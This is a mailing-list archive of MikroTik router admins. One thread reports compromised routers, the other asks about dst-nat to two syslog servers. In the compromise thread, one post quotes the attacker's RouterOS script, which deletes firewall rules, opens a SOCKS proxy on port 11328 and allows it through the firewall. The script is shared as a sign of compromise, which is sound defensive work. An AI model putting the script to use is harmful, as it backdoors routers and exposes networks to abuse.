Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-09 Thread ralphlists--- via Mikrotik-users 
I only found it on boards that had Hotspot enabled. Did others find it on
ones without Hotspot?

 

From: mikrotik-users-boun...@wispa.org  On
Behalf Of Bruce Bridegwater via Mikrotik-users
Sent: Sunday, August 5, 2018 9:06 PM
To: 'Shawn C. Peppers' ; 'Mikrotik Users'
; Bob Pensworth 
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

We found the same about 10 days ago.. Upgraded to most current OS and
firmware versions, changed winbox port to a 5 digit port and changed user
name from admin and 10 digit alpha numeric symbol password.

Only found it on wan interface that has a public ip. On almost all boards
including ccr devices.

Thought it was just us as we were at 6.41.3 or older.

  _  

From: mikrotik-users-boun...@wispa.org
  mailto:mikrotik-users-boun...@wispa.org> > on behalf of Bob Pensworth via
Mikrotik-users mailto:mikrotik-users@wispa.org> >
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 

 

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

 

/ip firewall filter remove [/ip firewall filter find where comment ~ "port
[0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255
connection-idle-timeout=60;/ip socks access remove [/ip socks access
find];/ip firewall filter add chain=input protocol=tcp port=11328
action=accept comment="port 11328";/ip firewall filter move [/ip firewall
filter find comment="port 11328"] 1;

 

-- 

Bob Pensworth, WA7BOB | General Manager

  CresComm WiFi, LLC | (360) 928-, x1

 

From: mikrotik-users-boun...@wispa.org
  mailto:mikrotik-users-boun...@wispa.org> > On Behalf Of Shawn C. Peppers
via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org  ;
memb...@wisp.org  
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

I have not tested this yet but

 

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflo
w

:: // Shawn Peppers

:: // DirectlinkAdmin.com  

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Multiple NAT targets

2018-08-09 Thread Josh Luthman via Mikrotik-users 
Ranges I think so too but I don't think csv

Josh Luthman
Office: 937-552-2340
Direct: 937-552-2343
1100 Wayne St
Suite 1337
Troy, OH 45373

On Thu, Aug 9, 2018, 1:50 PM Scott Reed via Mikrotik-users <
mikrotik-users@wispa.org> wrote:

> I am pretty sure you can do ranges (with a -) or a comma separated
> list.  Just be sure to check when you are done that it does what you want.
>
>
> On 8/9/2018 12:44, Nick Bright via Mikrotik-users wrote:
> > Is there a way to specify multiple to-address in a dst-nat rule?
> >
> > This may not even be the right way to approach the problem, but it's
> > what came to mind.
> >
> > I am trying to take my inbound syslog traffic, and send it to two
> > different syslog servers inside the firewall.
> >
> > Any suggestions?
> >
>
> --
> Scott Reed
> SBRConsulting, LLC
> Network and Wireless Consulting
> WISPA Vendor Member
> IN UMC Associate Lay Leader
> SLI Coach Trained
>
>
> ---
> This email has been checked for viruses by AVG.
> https://www.avg.com
>
> ___
> Mikrotik-users mailing list
> Mikrotik-users@wispa.org
> http://lists.wispa.org/mailman/listinfo/mikrotik-users
>
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Multiple NAT targets

2018-08-09 Thread Scott Reed via Mikrotik-users 
I am pretty sure you can do ranges (with a -) or a comma separated 
list.  Just be sure to check when you are done that it does what you want.


On 8/9/2018 12:44, Nick Bright via Mikrotik-users wrote:
> Is there a way to specify multiple to-address in a dst-nat rule?
>
> This may not even be the right way to approach the problem, but it's
> what came to mind.
>
> I am trying to take my inbound syslog traffic, and send it to two
> different syslog servers inside the firewall.
>
> Any suggestions?
>

-- 
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained


---
This email has been checked for viruses by AVG.
https://www.avg.com

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

Re: [Mikrotik Users] Multiple NAT targets

2018-08-09 Thread Josh Luthman via Mikrotik-users 
Talking about the dst-address?


Josh Luthman
Office: 937-552-2340
Direct: 937-552-2343
1100 Wayne St
Suite 1337
Troy, OH 45373

On Thu, Aug 9, 2018 at 12:44 PM, Nick Bright via Mikrotik-users <
mikrotik-users@wispa.org> wrote:

> Is there a way to specify multiple to-address in a dst-nat rule?
>
> This may not even be the right way to approach the problem, but it's
> what came to mind.
>
> I am trying to take my inbound syslog traffic, and send it to two
> different syslog servers inside the firewall.
>
> Any suggestions?
>
> --
> ---
> -  Nick Bright-
> -  Vice President of Technology   -
> -  Valnet -=- We Connect You -=-  -
> -  Tel 888-332-1616 x 315 / Fax 620-331-0789  -
> -  Web http://www.valnet.net/ -
> ---
> - Are your files safe?-
> - Valnet Vault - Secure Cloud Backup  -
> - More information & 30 day free trial at -
> - http://www.valnet.net/services/valnet-vault -
> ---
>
> ___
> Mikrotik-users mailing list
> Mikrotik-users@wispa.org
> http://lists.wispa.org/mailman/listinfo/mikrotik-users
>
___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users

[Mikrotik Users] Multiple NAT targets

2018-08-09 Thread Nick Bright via Mikrotik-users 
Is there a way to specify multiple to-address in a dst-nat rule?

This may not even be the right way to approach the problem, but it's 
what came to mind.

I am trying to take my inbound syslog traffic, and send it to two 
different syslog servers inside the firewall.

Any suggestions?

-- 
---
-  Nick Bright-
-  Vice President of Technology   -
-  Valnet -=- We Connect You -=-  -
-  Tel 888-332-1616 x 315 / Fax 620-331-0789  -
-  Web http://www.valnet.net/ -
---
- Are your files safe?-
- Valnet Vault - Secure Cloud Backup  -
- More information & 30 day free trial at -
- http://www.valnet.net/services/valnet-vault -
---

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users